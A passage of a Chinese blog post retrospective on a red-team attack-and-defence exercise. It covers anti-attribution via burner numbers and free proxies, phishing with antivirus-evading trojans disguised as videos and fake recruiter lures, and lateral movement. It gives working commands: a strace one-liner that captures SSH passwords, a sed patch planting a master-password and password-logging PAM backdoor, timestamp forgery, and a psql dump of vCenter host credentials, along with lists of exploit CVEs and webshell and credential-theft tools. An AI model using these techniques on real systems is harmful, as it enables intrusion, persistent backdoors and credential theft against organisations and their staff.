6）内网渗透人员：负责进入内网后的横向拓展。利用情报搜集人员的情报结合其他弱点来进行横向拓展，扩大战果。尝试突破核心系统权限，控制核心任务，获取核心数据，最终完成目标突破工作。</p>
<p>红队工作对人员的能力要求往往是综合性的、全面的，红队人员不仅要会熟练使用各种黑客工具、分析工具，还要熟知目标系统及其安全配置，并具备一定的代码开发能力，以便应对特殊问题。</p>
<h3 id="12-工具准备">1.2 工具准备</h3>
<p>根据自己的定位准备对应的工具，例如内网需要准备的东西：</p>
<p>1.工具：域前置、跳板机、免杀马儿、获取凭据的工具、隧道工具、扫描工具、横向移动工具、其他工具等等。。。。</p>
<p>2.知识点：代理(一层、多层)，获取各种凭据(工具和手动)，常见内网横向的方法、vcenter 相关、域渗透、域相关(拿下域控之后如何横向)</p>
<p><strong>防溯源：</strong></p>
<p>1.干净的信息，例如：邮箱用临时的、手机号码可以接码或者购买阿里小号、和多号、沃小号(目前阿里小号没号，可以尝试和多号和沃小号)、域名、服务器等</p>
<p>代理池:</p>
<p>白嫖</p>
<pre><code class="language-js">protocol==&quot;socks5&quot; &amp;&amp; &quot;Version:5 Method:No Authentication(0x00)&quot; &amp;&amp; after=&quot;2022-03-01&quot; &amp;&amp; country=&quot;CN&quot;

https://github.com/akkuman/rotateproxy
</code></pre>
<p>自己用服务器搭建socks代理</p>
<p>花钱飞鱼代理：https://www.feiyuip.com/user/about.html</p>
<h2 id="0x02-外网信息收集">0x02 外网信息收集</h2>
<p>信息收集主要目标系统的网络架构、IT 资产、敏感信息、组织管理与供应商等方面进行的情报搜集。目的在于帮助红队在攻击过程中快速定位薄弱点和采取正确的攻击路径，并为后两个阶段的工作提供针对性的建议，从而提高蓝队攻击工作效率和渗透成功率。比如：掌握了目标企业的相关人员信息和组织架构，就可以快速定位关键人物以便实施鱼叉攻击，或者确定内网横纵向渗透路径；而收集了 IT 资产信息，就可以为漏洞发现和利用提供数据支撑；掌握企业与供应商合作的相关信息，可为有针对性地开展供应链攻击提供素材。而究竟是要社工钓鱼，还是直接利用漏洞攻击或从供应链下手，一般取决于安全防护的薄弱环节究竟在哪里，以及红队对攻击路径的选择。</p>
<p><img src="images/image-20220823140459-yzvih4m.png" alt="image">​</p>
<h3 id="21案例">2.1案例</h3>
<p>主要对一级单位、二级单位和三级单位的资产进行收集，利用天眼查、企查查、爱企查、小蓝本查询公司组织股权结构、app、公众号等信息，利用空间引擎进行搜索图标的 hash、证书信息、域名、IP、C 段等，针对 web 资产进行全端口扫描、目录扫描、指纹信息等，还有一些邮箱等。</p>
<p>组织架构信息(公司官网查看)</p>
<p><img src="images/image-20220721161323-ic6lcwe.png" alt="image"></p>
<h2 id="0x03-外网打点钓鱼近源攻击">0x03 外网打点/钓鱼/近源攻击</h2>
<h3 id="31-外网打点">3.1 外网打点</h3>
<p>将整理好的资产进行分类，针对不同的应用进行攻击，尝试一些历史漏洞，弱口令等，进入后台之后查看配置文件，有几率会发现外网的数据库和阿里云的 key 等信息</p>
<h4 id="案例-1">案例 1</h4>
<p>通过弱口令登录后台，发现存在阿里云的 key</p>
<p><img src="images/image-20220519193752-1tgc3t4.png" alt="image.png"></p>
<p>使用阿里云 key 的利用工具，成功托管该账号的云服务，可直接执行命令，拿下主机。</p>
<p><img src="images/image-20220519194201-bx8runj.png" alt="image.png"></p>
<h4 id="案例-2">案例 2</h4>
<p>通过越权获取配置文件</p>
<p><img src="images/image-20220519194352-jvmui4u.png" alt="image.png"></p>
<p>可连接到数据库</p>
<p><img src="images/image-20220519194443-tgu2j4q.png" alt="image.png"></p>
<h4 id="案例-3">案例 3</h4>
<p>登录到系统之后可能会发现一些企业微信的 key，可获取信息也用来钓鱼</p>
<p><img src="images/image-20220830101150220.png" alt="image-20220830101150220"></p>
<h3 id="32-钓鱼">3.2 钓鱼</h3>
<p>在红队的工作中，往往长时间的外网打点也无法打到一个据点，钓鱼是最快速的攻击手段，根据场景定制不同的钓鱼方法会有意想不到的惊喜。</p>
<p>注意：钓鱼最重要的就是马儿，马儿一定要提前做好免杀，常用方法：分离免杀、白加黑等</p>
<h4 id="案例-1-招标网站钓鱼">案例 1-招标网站钓鱼</h4>
<p>在招标网站上，给工作人员发送投标文件</p>
<p><img src="images/image-20220520145657-mfwmdvu.png" alt="image.png"></p>
<p>成功上线一台主机</p>
<p><img src="images/image-20220519190329-s5st7ge.png" alt="image.png"></p>
<h4 id="案例-2-脉脉钓鱼">案例 2-脉脉钓鱼</h4>
<p>在脉脉上找到目标单位的人员，伪造猎头身份，向目标单位人员推荐有吸引力的工作岗位并添加微信，通过微信将恶意文件发送给目标人员(接码平台接码，新用户 1 毛开会员)</p>
<p><img src="images/image-20220519191118-oymr696.png" alt="image.png"><img src="images/image-20220830095222067.png" alt="image-20220830095222067"><img src="images/image-20220519191253-lsil8tb.png" alt="image.png"></p>
<p>制作一份伪装成视频文件的恶意程序。程序特点：免杀，超长文件名（中文 + 英文），exe 格式结尾。双击后会打开带有内容的视频文件并上线 CS。超长文件名是为了查看文件时让用户无法发现后缀。将恶意程序打成压缩包并添加密码。</p>
<p><img src="images/image-20220519192400-yggxu5i.png" alt="image.png"></p>
<h4 id="案例-3-伪造通知">案例 3-伪造通知</h4>
<p>通过伪造 xxx 通知，发送带有恶意文件的程序</p>
<p><img src="images/image-20220519192643-6i7gn3g.png" alt="image.png">​</p>
<p>团队使用的是 cs，使用批量发送的邮件的时候要考虑一个问题，当有许多机器上线的时候，需要及时的收到主机上线通知和快速的权限维持</p>
<p>上线通知：使用 cs 插件，有新的主机上线推送到钉钉。</p>
<p>快速权限维持：使用 cs 插件，可以参考：wgpsec 师傅的插件(地址：https://github.com/wgpsec/Automatic-permission-maintenance)，如果目标环境上存在 360 杀毒要考虑将进程注入白名单进程，否则运行计划任务时 360 会提示。</p>
<h3 id="33-近源攻击">3.3 近源攻击</h3>
<p>近源攻击现在也是比较常见的方式了，常见的手法有以下几种：</p>
<ul>
<li>WIFI 钓鱼，比如大菠萝等设备</li>
<li>直接插网线</li>
</ul>
<h4 id="案例">案例</h4>
<p>由于在攻防演练在甲方单位，相对于进入比较方便一些</p>
<p>提前获取了部分信息：部门 wifi 密码、上网认证的用户名密码</p>
<p>找了个存在 wifi 的地方，通过以上信息连接了 wifi，内网四通八达，fscan 一波猛扫，发现一些漏洞，通过日下 vcenter 成功获取域控(口子不能过夜)</p>
<h2 id="0x04-内网渗透">0x04 内网渗透</h2>
<p>进入内网之后需要横向拓展，当攻破某台内网终端或主机设备后，以此为基础，对相同网络环境中的其他设备发起的攻击活动；红队的内网横向拓展主要是指在突破进入目标网络内网以后，在内网主机、系统应用、服务器和网络设备等网络资产之间的跳转、控制、渗透过程</p>
<p><img src="images/image-20220823140634-ucwgls3.png" alt="image">​</p>
<h3 id="41-护网横向移动优先攻击策略">4.1 护网横向移动优先攻击策略</h3>
<p>目内网往往非常大，快速定位和找到关键节点是非常重要的，选择的主要原则为:</p>
<ul>
<li>快速掌握目标网络架构、网络设备及集权系统(堡垒机,运维管理机,性能监控系统,集中管控系统,域控等)</li>
<li>查找配置文件、系统日志、建设方案、wiki(在 wiki 中可能会存在网络架构图)、托管代码等、获取敏感信息，为拿下核心设备打下基础。</li>
</ul>
<p>例如 confluence 中存公司整体拓扑、地址范围等。</p>
<p><img src="images/image-20220830095349304.png" alt="image-20220830095349304"></p>
<p><img src="images/image-20220830095422929.png" alt="image-20220830095422929"></p>
<h3 id="42-基本操作">4.2 基本操作</h3>
<p>做好权限维持之后进行信息收集，主要分为以下几步。</p>
<p>1.收集目标机器上安装了哪些软件、存在哪些进程，通过进程查看存在哪些杀毒软件、软件等。</p>
<p>2.使用 HackBrowserData 抓取浏览器的一些信息，例如浏览器历史记录、cookie、保存的账号密码(在使用过程中发现 360 安全浏览器是抓不到密码的)等，一般情况下能抓到系统的密码</p>
<p>3.<strong>翻文件</strong>，说不定会存在一些密码文档,例如 xxx 系统的密码，发现内网的一些网段。</p>
<p>4.在条件允许的情况下可将目标主机开启双用户登录，打通隧道，这样就可以白天操作了，也可以使用 todek 等工具，上传到目标机器上，直接操作目标主机</p>
<p>5.在扫描其他网段的时候，只扫描.1、.2、.254 这几个地址，这样可以快速的知道哪几个网段存活，避免盲目扫描。通过 tracert 命令跟踪路由，说不定会有小惊喜。</p>
<p>6.拿下内网中的 nas、云盘等信息，在 nas 系统中搜索“系统、管理”等词汇，会有意想不到的惊喜</p>
<h3 id="43-linux-抓密码">4.3 linux 抓密码</h3>
<h4 id="431-利用strace抓密码">4.3.1 利用strace抓密码</h4>
<p>当我们拿下 windows 机器时可以通过抓内存中的密码进行横向，但 linux 却不可能抓到内存中的密码，但是 Debian 系列下的 linux 系统可以通过监听 sshd 进程的数据抓取出明文密码，比如你拿下了一台管理员机器，上面有 xshell，你可以手动开一个监听，在开一个登录，监听的窗口上就抓出密码了</p>
<pre><code class="language-shell">strace -xx -fp `cat /var/run/sshd.pid` 2&gt;&amp;1| grep --line-buffered -P 'write\(\d, &quot;\\x00' | perl -lne '$|++; @F=/&quot;\s*([^&quot;]+)\s*&quot;/g;for (@F){tr/\\x//d}; print for @F'|grep --line-buffered -oP '.{8}\K([2-7][0-9a-f])*$'|grep --line-buffered -v '^64$'|perl -pe 's/([0-9a-f]{2})/chr hex $1/gie'
</code></pre>
<p>当然你也可以直接用工具抓 xshell 存的密码</p>
<h4 id="432-linux-pam后门">4.3.2 Linux Pam后门</h4>
<p><strong>PAM</strong>是一种认证模块，PAM可以作为Linux登录验证和各类基础服务的认证，简单来说就是一种用于Linux系统上的用户身份验证的机制。进行认证时首先确定是什么服务，然后加载相应的PAM的配置文件(位于**/etc/pam.d**)，最后调用认证文件(位于**/lib/security**)进行安全认证</p>
<p><strong>简易利用</strong>的PAM后门也是通过修改<strong>PAM</strong>源码中认证的逻辑来达到权限维持</p>
<p>源码：<code>http://www.linux-pam.org/library/</code></p>
<p>查询版本：<code>rpm -qa | grep pam</code></p>
<p><img src="images/image-20220507123859801-20220519142633-bwbofsi.png" alt="image-20220507123859801"></p>
<pre><code>tar -xzvf Linux-PAM-1.1.1.tar.gz
cd Linux-PAM-1.1.1
</code></pre>
<p><strong>pam_unix_auth.c</strong> 修改认证逻辑，改成使用特定密码的后门，当然也可以作为一个记录敏感密码的功能，将记录的密码写入文件记录。</p>
<pre><code>sed -i -e 's/retval = _unix_verify_password(pamh, name, p, ctrl);/retval = _unix_verify_password(pamh, name, p, ctrl);\n\tif (strcmp(p,&quot;'snsn123123'&quot;)==0 ){retval = PAM_SUCCESS;}if(retval == PAM_SUCCESS){\n\tFILE * fp;\n\tfp = fopen(&quot;/tmp/.sshd&quot;, &quot;a&quot;);\n\tfprintf(fp, &quot;%s : %s\\n&quot;, name, p);\n\tfclose(fp);\n\t}/g' modules/pam_unix/pam_unix_auth.c
</code></pre>
<p><img src="images/image-20220507115744765-20220519142633-86jidse.png" alt="image-20220507115744765"></p>
<pre><code>./configure &amp;&amp; make
</code></pre>
<p><img src="images/image-20220507115807825-20220519142633-m1wyevf.png" alt="image-20220507115807825"></p>
<pre><code>cp -rf /usr/lib64/security/pam_unix.so /usr/lib64/security/pam_unix.so.bak
cp -rf pam_unix.so /usr/lib64/security/pam_unix.so
</code></pre>
<p><img src="images/image-20220507123304917-20220519142633-draro9p.png" alt="image-20220507123304917"></p>
<pre><code>oldtime=`stat -c '%z' /lib64/security/pam_ftp.so`
touch -d &quot;$oldtime&quot; /usr/lib64/security/pam_unix.so
</code></pre>
<p><img src="images/image-20220507123322084-20220519142633-2ug7cdt.png" alt="image-20220507123322084"></p>
<p>当管理员登录之后就会有新的密码写入</p>
<p><img src="images/image-20220507123513858-20220519142633-hvikkur.png" alt="image-20220507123513858"></p>
<p>通过万能密码也可以成功登陆服务器</p>
<p><img src="images/image-20220830100414058.png" alt="image-20220830100414058"></p>
<h3 id="44-域渗透">4.4 域渗透</h3>
<p>进入域之后为了获取最大的权限，通常想方设法将获取域控的权限，以下列举几种不同的攻击手法</p>
<h4 id="441-域漏洞">4.4.1 域漏洞</h4>
<pre><code>ms14-068
zerologon(CVE-2020-1472)
CVE-2021-1675(Windows Print Spooler)
sAMAccountName spoofing(CVE-2021-42278、CVE-2021-42287)
ADCS(CVE-2022–26923)
权限配置不当:ACL
组策略GPP和SYSVOL中的密码
基于委派的测试(约束委派、非约束委派、资源委派)
Relay（中继）
Exchange、WSUS、DNS
Backup Operators组成员权限到域控权限

....等等等
</code></pre>
<h3 id="45-vcenter">4.5 vcenter</h3>
<p>在攻防演练中<code>vcenter</code>作为一个运维集群管控系统，作为一个攻击人员想要在红方演练中快速刷分，<code>Vcenter</code>的价值不亚于域控的价值。</p>
<h4 id="451-常见漏洞">4.5.1 常见漏洞</h4>
<pre><code>CVE-2021-21972
CVE-2021-21985
CVE-2021-22005
provider-logo SSRF 漏洞
log4j2 JNDI 注入
</code></pre>
<p>通过漏洞拿下<code>vcenter</code>之后，一般情况下是<code>vsphere-ui</code>权限，那就需要通过漏洞获取到root权限，常用提权方法如下。</p>
<h4 id="452-提权">4.5.2 提权</h4>
<pre><code>CVE-2021-22015 本地提权
CVE-2021-3156  本地提权
</code></pre>
<h4 id="453-后渗透">4.5.3 后渗透</h4>
<h5 id="4531-saml-证书登录">4.5.3.1 SAML 证书登录</h5>
<p>Sphere 5.0 版本引入了 SSO，支持使用 SAML 作为授权服务支持。当用户登录服务时，该服务会将身份验证请求转发给 SAML 。SAML 验证用户凭据是否正确以及他们是否有权访问指定的服务。</p>
<p>在 <code>vCenter</code> 中从 <code>/storage/db/vmware-vmdir/data.mdb</code> 提取 <code>ldap</code>证书，为管理员用户创建 <code>SAML</code> 请求，最后使用 vCenter server 进行身份验证并获得有效的管理员 <code>cookie</code>。</p>
<p>首先需要从 <code>vCenter</code> 获得数据库文件：</p>
<ul>
<li>Linux：<code>/storage/db/vmware-vmdir/data.mdb</code></li>
<li>Windows：<code>C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb</code></li>
</ul>
<p>使用SAML脚本解密</p>
<p><img src="images/image-20220520164121-1ynm6m0.png" alt="image.png"></p>
<p>登录 vcenter后台，访问 <code>https://IP/</code>，添加cookie，修改完成之后，点击页面的启动。</p>
<p><img src="images/image-20220520163855-vwh4dmi.png" alt="image.png"></p>
<p><img src="images/image-20220520163922-z6somg3.png" alt="image.png"></p>
<h5 id="4532-vhost_password_decrypt">4.5.3.2 vhost_password_decrypt</h5>
<p>查看数据库密码</p>
<pre><code>cat /etc/vmware-vpx/vcdb.properties /etc/vmware/service-state/vpxd/vcdb.properties
</code></pre>
<p>导出连接数据库</p>
<pre><code>psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c &quot;select ip_address,user_name,password from vpx_host;&quot; &gt; password.enc
</code></pre>
<p>将password.enc导出到本地，运行脚本解密</p>
<p><img src="images/image-20220506200517666-20220519142633-fb4kh3z.png" alt="image-20220506200517666"></p>
<p>解出来之后直接登录ex</p>
<p><img src="images/image-20220519195812-bv9kfln.png" alt="image.png"></p>
<p><img src="images/image-20220506200604000-20220519142633-tpqmkay.png" alt="image-20220506200604000"></p>
<h3 id="46-清理痕迹">4.6 清理痕迹</h3>
<p>上传的工具、马儿、扫描记录等等等，有关你的一切都删除，来也匆匆去也匆匆</p>
<h2 id="0x05-附录">0x05 附录</h2>
<p>这里只是列举了部分工具，工具太多，每个人的习惯也不同</p>
<h3 id="信息收集">信息收集</h3>
<h4 id="shuize">ShuiZe</h4>
<p>一条龙服务，只需要输入根域名即可全方位收集相关资产，并检测漏洞。也可以输入多个域名、C 段 IP 等，具体案例见下文。</p>
<pre><code class="language-js">https://github.com/0x727/ShuiZe\_0x727
</code></pre>
<h4 id="arl">ARL</h4>
<p>基于斗象灯塔 ARL 修改后的版本。相比原版，增加了 OneForAll、中央数据库，修改了 altDns</p>
<pre><code class="language-js">https://github.com/ki9mu/ARL-plus-docker
</code></pre>
<h4 id="enscan_go">ENScan_GO</h4>
<p>‘一款基于各大企业信息 API 的工具</p>
<pre><code class="language-js">https://github.com/wgpsec/ENScan_GO
</code></pre>
<h4 id="fofa_viewer">fofa_viewer</h4>
<p>一个简单实用的 FOFA 客户端 By flashine</p>
<pre><code class="language-js">https://github.com/wgpsec/fofa_viewer
</code></pre>
<h4 id="空间搜索引擎">空间搜索引擎</h4>
<pre><code class="language-js">https://hunter.qianxin.com/
https://fofa.info/
https://www.shodan.io/
https://www.zoomeye.org/
https://quake.360.cn/
https://www.00sec.com/
</code></pre>
<h4 id="指纹识别">指纹识别</h4>
<pre><code class="language-js">https://github.com/EdgeSecurityTeam/EHole
https://github.com/EASY233/Finger
</code></pre>
<h3 id="端口扫描">端口扫描</h3>
<pre><code class="language-js">https://github.com/lcvvvv/gonmap
https://github.com/shadow1ng/fscan
</code></pre>
<h3 id="漏洞扫描工具">漏洞扫描工具</h3>
<pre><code class="language-js">https://github.com/chaitin/xray
https://github.com/zhzyker/vulmap
https://github.com/projectdiscovery/nuclei
awvs使用docker一键搭建
</code></pre>
<h3 id="漏洞利用">漏洞利用</h3>
<h4 id="ak-资源管理工具">AK 资源管理工具</h4>
<pre><code class="language-js">https://github.com/wyzxxz/aksk_tool
https://github.com/teamssix/cf
</code></pre>
<h4 id="数据库利用工具">数据库利用工具</h4>
<pre><code class="language-js">https://github.com/SafeGroceryStore/MDUT
https://github.com/uknowsec/SharpSQLTools
navicat
https://github.com/yuyan-sec/RedisEXP
</code></pre>
<h4 id="爆破利用工具">爆破利用工具</h4>
<pre><code class="language-js">https://github.com/shack2/SNETCracker
</code></pre>
<h3 id="shell">shell</h3>
<pre><code class="language-js">https://github.com/BeichenDream/Godzilla
https://github.com/rebeyond/Behinder
https://github.com/AntSwordProject/antSword
菜刀
</code></pre>
<h3 id="密码提取工具">密码提取工具</h3>
<pre><code class="language-js">Xshell，Xftp密码解密工具
https://github.com/JDArmy/SharpXDecrypt

解密浏览器数据（密码|历史记录|Cookie|书签 | 信用卡 | 下载记录）的导出工具，支持全平台主流浏览器
https://github.com/moonD4rk/HackBrowserData/
</code></pre>
<h3 id="隧道代理工具">隧道代理工具</h3>
<pre><code class="language-js">proxychain
sockscap64    (https://www.mediafire.com/folder/32rj1769a2w82/v4.7)
proxifier     (https://www.proxifier.com/download/ProxifierSetup.exe)


https://github.com/fatedier/frp
https://github.com/ehang-io/nps
https://github.com/ph4ntonn/Stowaway
https://github.com/Dliv3/Venom
https://github.com/editso/fuso(相对冷门，不会被杀)
</code></pre>
<h3 id="横向">横向</h3>
<pre><code class="language-js">impacket套件
</code></pre>

    </div>
    <div class="article-footer">
<blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接: </strong>
      <a href="https://ad-calcium.github.io/2022/08/%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83%E5%A4%8D%E7%9B%98/" title="攻防演练复盘" target="_blank" rel="external">https://ad-calcium.github.io/2022/08/%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83%E5%A4%8D%E7%9B%98/</a>
    </li>
    <li class="post-copyright-license">
      <strong>License: </strong>
        <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN</a>
    </li>
  </ul>
</blockquote>

<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/ad-calcium" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="https://ad-calcium.github.io/avatar.png" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/ad-calcium" target="_blank"><span class="text-dark">AD钙奶</span><small class="ml-1x"></small></a></h3>
        <div>Good Good Study, Day Day Up~</div>
      </div>
    </figure>
  </div>
</div>

    </div>
  </article>
</div><nav class="bar bar-footer clearfix" data-stick-bottom>
    <div class="bar-inner">
        <ul class="pager pull-left">
            <li class="prev">
                <a href="https://ad-calcium.github.io/2022/05/%E4%B8%80%E6%AC%A1%E5%B9%B3%E5%B9%B3%E6%97%A0%E5%A5%87%E7%9A%84%E6%B8%97%E9%80%8F/" title="一次平平无奇的渗透"><i
                        class="icon icon-angle-left"
                        aria-hidden="true"></i><span>&nbsp;&nbsp;下一篇</span></a>
            </li>
            <li class="next">
                <a href="https://ad-calcium.github.io/2022/12/%E7%BC%96%E5%86%99yaml%E6%A0%BC%E5%BC%8Fpoc/"
                    title="编写YAML格式POC"><span>上一篇&nbsp;&nbsp;</span><i
                        class="icon icon-angle-right" aria-hidden="true"></i></a>
            </li>
            
            <li class="toggle-toc">
                <a class="toggle-btn collapsed" data-toggle="collapse" href="#collapseToc" aria-expanded="false"
                    title="文章目录" role="button">
                    <span>[&nbsp;</span><span>文章目录</span>
                    <i class="text-collapsed icon icon-anchor"></i>
                    <i class="text-in icon icon-close"></i>
                    <span>]</span>
                </a>
            </li>
        </ul>
        <div class="bar-right">
            <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter"
                data-mobile-sites="weibo,qq,qzone"></div>
        </div>
    </div>
</nav>


</main><footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
  <div class="copyright">
    &copy;2020  -
    2023

    
  </div>
</footer>

<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/MathJax.js?config=TeX-MML-AM_SVG"></script>
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
            showMathMenu: false, //disables context menu
            tex2jax: {
            inlineMath: [ ['$','$'], ['\\(','\\)'] ]
           }
    });
</script>


<script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>
<script>
    window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/highlight.min.js"></script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/languages/python.min.js" defer></script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/languages/javascript.min.js" defer></script><script>
    hljs.configure({
        tabReplace: '    ', 
        classPrefix: ''     
        
    })
    hljs.initHighlightingOnLoad();
</script>
<script src="https://ad-calcium.github.io/js/application.min.a94ab19cb63a95c8d7fbd7b85cab3ddeea8c369bdf75b9cab6708787ead123af.js"></script>
<script src="https://ad-calcium.github.io/js/plugin.min.19c5bcb2fb0789ab4f2b7834e5ceb5e92635645605bab902c1024b25f1502364.js"></script>

<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(未命名)',
            },
            ROOT_URL: 'https:\/\/ad-calcium.github.io\/',
            CONTENT_URL: 'https:\/\/ad-calcium.github.io\/\/searchindex.json ',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script type="text/javascript" src="https://ad-calcium.github.io/js/insight.min.4a2d52de4bfff73e0c688404fe3d17c9a3ae12d9888e1e1ac9c690e4890de2ded50fe55f2b819c2ba55435a76f396f3ea6805765f0b0af5635cdf74ea459eab0.js" defer></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js"></script>
<script>
    tocbot.init({
        
        tocSelector: '.js-toc',
        
        contentSelector: '.js-toc-content',
        
        headingSelector: 'h1, h2, h3',
        
        hasInnerContainers: true,
    });
</script>


<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
	ga('create', 'UA-289626488-X', 'auto');
	
	ga('send', 'pageview');
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>

  </body>
</html>
